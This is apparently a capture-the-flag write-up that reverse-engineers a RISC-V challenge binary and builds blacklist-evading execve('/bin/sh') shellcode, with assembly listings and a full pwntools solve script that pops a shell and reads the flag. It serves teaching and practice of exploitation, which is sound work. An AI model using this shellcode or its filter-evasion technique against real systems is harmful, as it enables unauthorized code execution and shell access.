Binary
The given binary risky-business
is a 64 bit, dynamically linked executable, compiled for Risc-V.
$ file risky-business
risky-business: ELF 64-bit LSB pie executable, UCB RISC-V, RVC, double-float ABI, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-riscv64-lp64d.so.1, for GNU/Linux 4.15.0, BuildID[sha1]=2bb703ff4a5af43fb10e8ca4fd8a39b488a701f7, not stripped
$ checksec risky-business
[*] 'risky-business'
Arch: riscv64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
To execute it we can download the libraries for risc-v with sudo apt install libc6-riscv64-cross
and run it under QEMU with qemu-riscv64 -L /usr/riscv64-linux-gnu ./risky-business
. Unfortunately it doesn’t give us any information as the program just takes an input and exists without any output, so let’s go decompile it with Ghidra to see what it is doing.
Understanding the program
This is the main()
function of the program, decompiled by Ghidra after I renamed the variables.
void main(void)
{
int len;
char next_nibble;
int a;
int b;
uint i;
char buffer [72];
long canary;
char previous_nibble;
canary = ___stack_chk_guard;
fgets(buffer,0x43,_stdin);
len = strlen(buffer);
a = len - 1;
b = len - 2;
previous_nibble = buffer[len + -1] >> 4;
for (i = (len - 1) * 2; -1 < i; i--) {
if ((i & 1) == 0) {
next_nibble = buffer[a] & 0xf;
a = a + -1;
}
else {
next_nibble = buffer[b] >> 4;
b = b + -1;
}
if ((((previous_nibble == 7) && (next_nibble == 3)) ||
((previous_nibble == 0 && (next_nibble == 0)))) ||
((previous_nibble == 0 && (next_nibble == 10)))) goto exit;
previous_nibble = next_nibble;
}
(*(code *)buffer)(buffer);
exit:
if (canary != ___stack_chk_guard) {
exit(0);
}
return;
}
We can see that we first read a 66 bytes input (0x43 includes the null terminator of the string), and then check each pair of nibbles in our input to blacklist the combinations 0x73
, 0x00
, 0x0a
. If we pass the check our input is executed. So this challenge is a shellcode challenge with blacklist. If the restriction was only on bytes this check would mainly prevent us from using a syscall instruction in our input (ecall
is b"\x73\x00\x00\x00"
) or to hardcode /bin/sh
in our input as 0x73
is also the value for s
. Unfortunately we will have a few more complications since it’s not just checking the bytes, but let’s think about it later.
The thing we want to be careful about with the fact that 0x0a
is blacklisted is that when we send our shellcode we can not let it finish with a \n
. fgets
will wait until we send 66 bytes or a line terminator, but if it receives the new line it will be included in the string that is checked and make us fail. The intuitive solution is therefore to just make sure we always send as much data as fgets is expecting.
Another option is to terminate ourself the shellcode with a null byte so that it will be \x00\x0a
and the line terminator will be ignored by the program. While thinking about this explanation though I realised something I could have used to simplify a bit the challenge, do you see it ?
Think about what is being checked exactly.
Yes, the check expects the shellcode to be a continuous string, which seems intuitive since we are calling the function “get a string from a file”, but gets
and fgets
do not treat the null byte \x00
as a terminator, only the line terminator \x0a
, this means that if we would have an instruction with a null byte at the beginning of the shellcode, we could write anything afterwards and it would not be checked. The only constraint would be the length.
Since \x00
is usually THE byte to avoid in any shellcode I really didn’t think about this when solving the challenge, but I kinda love the idea of almost having as a constraint that we MUST use it at some point and now I’m wondering if it was intended or not. But if you want to practice when you are done with this writeup, try to write your own shellcode this way ;-)
The other thing that I notice is that although checksec
says the stack is not executable this doesn’t seem to be enforced. From what I found it is standard for RISC-V, or at least when running under qemu-user, to have the stack executable ignoring the NX flag, but I don’t know enough about it (https://github.com/riscvarchive/riscv-glibc/issues/5).
Writing the shellcode
Since I never worked with RISCV before, I started from a generic shellcode from shellstorm to call execve("/bin/sh")
without using the bytes 0x20
, 0x0a
and 0x00
. Here is the specific shellcode I used, long 76 bytes:
| entry0 ();
| 0x000100b0 0111 addi sp, sp, -32
| 0x000100b2 06ec sd ra, 24(sp)
| 0x000100b4 22e8 sd s0, 16(sp)
| 0x000100b6 13042102 addi s0, sp, 34
| 0x000100ba b767696e lui a5, 0x6e696
| 0x000100be 9387f722 addi a5, a5, 559
| 0x000100c2 2330f4fe sd a5, -32(s0)
| 0x000100c6 b7776810 lui a5, 0x10687
| 0x000100ca 33480801 xor a6, a6, a6
| 0x000100ce 0508 addi a6, a6, 1
| 0x000100d0 7208 slli a6, a6, 0x1c
| 0x000100d2 b3870741 sub a5, a5, a6
| 0x000100d6 9387f732 addi a5, a5, 815
| 0x000100da 2332f4fe sd a5, -28(s0)
| 0x000100de 930704fe addi a5, s0, -32
| 0x000100e2 0146 li a2, 0
| 0x000100e4 8145 li a1, 0
| 0x000100e6 3e85 mv a0, a5
| 0x000100e8 9308d00d li a7, 221
| 0x000100ec 93063007 li a3, 115
| 0x000100f0 230ed1ee sb a3, -260(sp)
| 0x000100f4 9306e1ef addi a3, sp, -258
\ 0x000100f8 6780e6ff jr -2(a3)
Understanding the RISCV shellcode
Reading the shellcode I identified 4 main sections.
Firstly it creates a new frame on the stack for this “function” and stores the registers ra
and s0
to preserve them, but this can easily be removed since we don’t need to preserve the state of the process.
| 0x000100b0 0111 addi sp, sp, -32 # sp = sp - 32
| 0x000100b2 06ec sd ra, 24(sp) # *(sp + 24) = ra
| 0x000100b4 22e8 sd s0, 16(sp) # *(sp + 16) = s0
| 0x000100b6 13042102 addi s0, sp, 34 # s0 = sp + 34
Then it builds /bin
and /sh\x00
in the register a5
, stores the complete string /bin/sh\x00
on the stack and then loads the pointer to it into a5
. a6
is used to compute the null terminator in /sh\x00
without having to put a null byte in the shellcode.
| 0x000100ba b767696e lui a5, 0x6e696 # a5 = 0x6e696000 [a5 = b"\x00`in"]
| 0x000100be 9387f722 addi a5, a5, 559 # a5 = a5 + 0x22f [a5 = b"/bin"]
| 0x000100c2 2330f4fe sd a5, -32(s0) # *(s0 - 32) = a5
| 0x000100c6 b7776810 lui a5, 0x10687 # a5 = 0x10687000 [a5 = b"\x00\xph\0x10"]
| 0x000100ca 33480801 xor a6, a6, a6 # a6 = 0x0
| 0x000100ce 0508 addi a6, a6, 1 # a6 = 0x1
| 0x000100d0 7208 slli a6, a6, 0x1c # a6 = 0x10000000
| 0x000100d2 b3870741 sub a5, a5, a6 # a5 = a5 - a6 [a5 = b"\x00\ph\x00"]
| 0x000100d6 9387f732 addi a5, a5, 815 # a5 = a5 + 0x32f [a5 = b"/sh\x00"]
| 0x000100da 2332f4fe sd a5, -28(s0) # *(s0 - 28) = a5
| 0x000100de 930704fe addi a5, s0, -32 # a5 = s0 - 32
Next it loads all the arguments for the syscall execve("/bin/sh\x00", 0, 0)
, where a7
is used for the syscall code while a0
to a2
are the arguments.
| 0x000100e2 0146 li a2, 0 # args[2] = 0
| 0x000100e4 8145 li a1, 0 # args[1] = 0
| 0x000100e6 3e85 mv a0, a5 # args[0] = &bin_sh
| 0x000100e8 9308d00d li a7, 221 # sys_execve
Finally, since the ecall
instruction also contains null bytes, this shellcode generates it in a3
, saves it on the stack (that we remember is executable) and then jumps to it. It has to jump relative to the register and not directly onto it though to avoid instructions that have a null byte. (jr 0(a3)
would use a null byte due to the offset 0x00, while jalr xx, a3
has null byte in the instruction itself.)
| 0x000100ec 93063007 li a3, 115 # a3 = 0x0000000073
| 0x000100f0 230ed1ee sb a3, -260(sp) # *(sp - 260) = a3
| 0x000100f4 9306e1ef addi a3, sp, -258 # a3 = sp - 258
\ 0x000100f8 6780e6ff jr -2(a3) # jump (a3 - 2)
Simplify the shellcode
To use this shellcode we have two problems to solve. First of all the shellcode is too long for our challenge, but we will also see soon, it has a few nibble pairs that are not allowed.
We can quickly start by removing the part of the shellcode that defines the new stack frame, focus on making the shellcode valid, and then look into how to shorten it further if needed. I will start by cutting the first 4 instructions and use directly sp
instead of s0
when storing b"/bin/sh\x00"
on the stack.
0: 6e6967b7 lui a5, 0x6e696
4: 22f78793 addi a5, a5, 559
8: fef13023 sd a5, -32(sp)
c: 106877b7 lui a5, 0x10687
10: 01084833 xor a6, a6, a6
14: 0805 addi a6, a6, 1
16: 0872 slli a6, a6, 0x1c
18: 410787b3 sub a5, a5, a6
1c: 32f78793 addi a5, a5, 815
20: fef13223 sd a5, -28(sp)
24: fe010793 addi a5, sp, -32
28: 4601 li a2, 0
2a: 4581 li a1, 0
2c: 853e mv a0, a5
2e: 0dd00893 li a7, 221
32: 07300693 li a3, 115
36: eed10e23 sb a3, -260(sp)
3a: efe10693 addi a3, sp, -258
3e: ffe68067 jr -2(a3)
You may notice that the byte representation of the instructions is different. This is a change in endianness between how they were represented on shellstorm and how pwnlib.disasm()
, that I’m using here, represents them. This later representation in little-endian though is better for our challenge since it coincides with the order in which the nibble pairs are being checked. This new shellcode now is long exactly 66 bytes, but we can see that the li ax, ...
instructions have a 00
pair in them and li a3, 115
also contains a 73
pair.
To solve this problem we can do some math instead of loading directly 221
into a7
. The factors of 221
are 13
and 17
, so we can load our register with:
2e: 4335 li t1, 13
30: 42c5 li t0, 17
32: 026288b3 mul a7, t0, t1
Then for a3
we just have to use an offset from a7
we just computed.
36: f9688693 addi a3, a7, 115 - 221
Unfortunately the shellcode is now too long, with 70 bytes and we will have to modify it even further, but I’m not super confident I will not break it by accident (spoiler, I did; a few times…), so let’s make sure that it continues to work. Skip the next section though if you just want to go to the solution.
Make sure the shellcode is always correct
This script will first check that we don’t have pairs of nibbles that are blacklisted, then execute the program and change the length of fgets
at runtime to make sure the whole shellcode is read even if ours is currently too long. If at the end we reached execve("/bin/sh\x00", NULL, NULL)
we know the current iteration of the shellcode is valid and that we only have to shorten it further, if not we can pinpoint which instruction didn’t behave as expected. I will not go through all the mistakes I made while writing the shellcode, but at least here is how I found them.
To debug your programs emulated with QEMU
remember that you first need to install gdb-multiarch
and link the libraries directly with qemu sudo ln -s /usr/riscv64-linux-gnu/ /etc/qemu-binfmt/riscv64
.
from gdb_plus import *
binary_name = "risky-business"
# Make sure to set the context so that pwntools will use gdb-multiarch to debug the program
exe = ELF(binary_name, checksec=True)
context.binary = exe
# Already setup the ip of the server for when we will want to get the flag
HOST = "127.0.0.1"
PORT = 4000
dbg = Debugger(f"./{binary_name}", aslr=False).remote(HOST, PORT)
shellcode = asm("""
lui a5, 0x6e696
addi a5, a5, 559
sd a5, -32(sp)
lui a5, 0x10687
xor a6, a6, a6
addi a6, a6, 1
slli a6, a6, 0x1c
sub a5, a5, a6
addi a5, a5, 815
sd a5, -28(sp)
addi a5, sp, -32
li a2, 0
li a1, 0
mv a0, a5
li t1, 13
li t0, 17
mul a7, t0, t1
addi a3, a7, 115 - 221
sb a3, -260(sp)
addi a3, sp, -258
jr -2(a3)
""").ljust(0x42, b"A")
# Make sure the program respects the blacklist
def nibble_string(shellcode):
nibbles = ""
for i, _ in enumerate(shellcode):
nibbles += shellcode[::-1].hex()[i*2]
nibbles += shellcode[::-1].hex()[i*2+1]
return nibbles
assert "73" not in nibble_string(shellcode)
assert "0a" not in nibble_string(shellcode)
assert "00" not in nibble_string(shellcode)
log.success("The shellcode is valid!")
# Change the argument of fgets to the length of our payload
def extend_read(dbg):
size = dbg.args[1]
if len(shellcode) >= size:
log.warn(f"Your shellcode is still too long! {len(shellcode)}/{size - 1}")
dbg.args[1] = len(shellcode) + 1 # Overwrite the argument
return False # Tell gdb to not stop after executing the callback
dbg.b("fgets", callback=extend_read)
CALL_SHELLCODE = 0x896 # Address taken from ghidra
dbg.until(CALL_SHELLCODE, wait=False) # Let the program run until it jumps to the shellcode
dbg.p.sendline(shellcode)
If we then step with gdb to check what the shellcode is doing we indeed get the correct result
â–º 0x4001802d9c ecall <SYS_execve>
path: 0x4001802e80 ◂— 0x68732f6e69622f /* '/bin/sh' */
argv: 0
envp: 0
We can also automate the check so that we just have to execute the script to know immediately that the shellcode is still working without going manually with GDB.
...
CALL_SHELLCODE = 0x896
done = dbg.until(CALL_SHELLCODE, wait=False)
dbg.p.sendline(shellcode)
if args.QUICK: # We define a new argument for when to enter this loop
done.wait() # Wait for the program to reach the breakpoint
try:
dbg.until(dbg.sp - 260, hw=True) # hardware breakpoint because that address will be overwritten by our shellcode, so we can not use a software breakpoint.
assert dbg.next_inst.mnemonic == "ecall"
assert dbg.read_string(dbg.syscall_args[0]) == b"/bin/sh"
assert dbg.syscall_args[1] == 0
assert dbg.syscall_args[2] == 0
except Exception:
log.error("The shellcode is wrong! Check manually where it messed up.")
log.success("The shellcode is still right! You can go on.")
dbg.close()
$ python3 ./solve.py QUICK
[+] Starting local process '/usr/bin/qemu-riscv64': pid 51087
[+] The shellcode is valid!
[!] Your shellcode is still too long! 70/66
[+] The shellcode is still right! You can go on.
[*] Stopped process './risky-business' (pid 51087)
Find 4 more bytes to remove
We can continue to optimises the shellcode. The first thing we can see is that it is using a5
to store the pointer to b"/bin/sh\x00"
and then moving it a0
while we can store it there immediately. This removes 2 bytes. My second optimisation came by looking at the length of xor, a6, a6, a6
which is 4 bytes long, while li a2, 0
is only long 2 bytes. One option is to try li a6, 0
which is also 2 bytes long; the other one is to use a register that is used more often such as a1
, and this would have removed 2 bytes both from the xor and from the sub a5, a5, a6
.
0: 6e6967b7 lui a5, 0x6e696
4: 22f78793 addi a5, a5, 559
8: fef13023 sd a5, -32(sp)
c: 106877b7 lui a5, 0x10687
10: 4801 li a6, 0
12: 0805 addi a6, a6, 1
14: 0872 slli a6, a6, 0x1c
16: 410787b3 sub a5, a5, a6
1a: 32f78793 addi a5, a5, 815
1e: fef13223 sd a5, -28(sp)
22: fe010513 addi a0, sp, -32
26: 4601 li a2, 0
28: 4581 li a1, 0
2a: 4335 li t1, 13
2c: 42c5 li t0, 17
2e: 026288b3 mul a7, t0, t1
32: f9688693 addi a3, a7, -106
36: eed10e23 sb a3, -260(sp)
3a: efe10693 addi a3, sp, -258
3e: ffe68067 jr -2(a3)
But now do you see an even simpler options to shorten the shellcode that I missed while solving the challenge ?
Quiz moment. Click for the solution.
Of course we can use a shift instruction to set the null byte in /sh\x00
instead of wasting 10 bytes with a6
. You just have to be careful to not load directly 0x68732
as the s
of sh
is still blacklisted, but since we need an addi
instruction anyway for the last nibble it’s not a problem to change the last 12 bits.
c: 687117b7 lui a5, 0x68711 # a5 = 0x68711000
10: 83a1 srli a5, a5, 0x8 # a5 = 0x00687110
12: 21f78793 addi a5, a5, 0x21f # a5 = 0x0068732f
16: fef13223 sd a5, -28(sp)
Otherwise you can try to compute 0x0068732f
as a5 - 0x6e00ef00
, but I don’t like the number of null bytes there.
Execute final exploit
from gdb_plus import *
binary_name = "risky-business"
exe = ELF(binary_name, checksec=True)
context.binary = exe
IP = "127.0.0.1"
PORT = 4000
dbg = Debugger(f"./{binary_name}", aslr=False).remote(IP, PORT)
shellcode = asm("""
lui a5, 0x6e696
addi a5, a5, 559 # 0x6e69622f
sd a5, -32(sp)
lui a5, 0x10687
li a6, 0
addi a6, a6, 1
slli a6, a6, 0x1c
sub a5, a5, a6
addi a5, a5, 815 # 0x1068732f
sd a5, -28(sp)
addi a0, sp, -32
li a2, 0
li a1, 0
li t1, 13
li t0, 17
mul a7, t0, t1
addi a3, a7, -106
sb a3, -260(sp)
addi a3, sp, -258
jr -2(a3)
""").ljust(0x42, b"A")
def nibble_string(shellcode):
nibbles = ""
for i, _ in enumerate(shellcode):
nibbles += shellcode[::-1].hex()[i*2]
nibbles += shellcode[::-1].hex()[i*2+1]
return nibbles
assert "73" not in nibble_string(shellcode)
assert "0a" not in nibble_string(shellcode)
assert "00" not in nibble_string(shellcode)
log.success("The shellcode is valid!")
def extend_read(dbg):
size = dbg.args[1]
if len(shellcode) >= size:
log.warn(f"Your shellcode is still too long! {len(shellcode)}/{size - 1}")
dbg.args[1] = len(shellcode) + 1
return False
dbg.b("fgets", callback=extend_read)
CALL_SHELLCODE = 0x896
done = dbg.until(CALL_SHELLCODE, wait=False)
dbg.p.sendline(shellcode)
if args.QUICK:
done.wait()
try:
dbg.until(dbg.sp - 260, hw=True)
assert dbg.next_inst.mnemonic == "ecall"
assert dbg.read_string(dbg.syscall_args[0]) == b"/bin/sh"
assert dbg.syscall_args[1] == 0
assert dbg.syscall_args[2] == 0
except Exception:
log.error("The shellcode is wrong! Check manually where it messed up.")
log.success("The shellcode is still right! You can go on.")
dbg.close()
sleep(0.1) # Wait for the execution of the shellcode to finish .
dbg.p.sendline(b"cat flag.txt")
flag = dbg.p.recvline().decode()
log.success(f"FLAG: {flag}") # You won <3
And the exploit works both locally
$ python3 ./solve.py NOPTRACE
[+] Starting local process './risky-business': pid 25461
[+] The shellcode is valid!
[!] Debug is off, gdb commands won't be executed
[+] FLAG: test_flag{solved}
[*] Stopped process './risky-business' (pid 25461)
and remotely
$ python3 ./solve.py REMOTE
[+] Opening connection to 127.0.0.1 on port 4000: Done
[+] The shellcode is valid!
[!] Debug is off, gdb commands won't be executed
[+] FLAG: <REDACTED>
[*] Closed connection to 127.0.0.1 port 4000
Challenge solved! We saw how to write a simple shellcode in risc-v and that the stack may be executable. Furthermore I relearned that fgets has no problem at all reading null bytes, although it would be time for me to remember it…
Your turn now!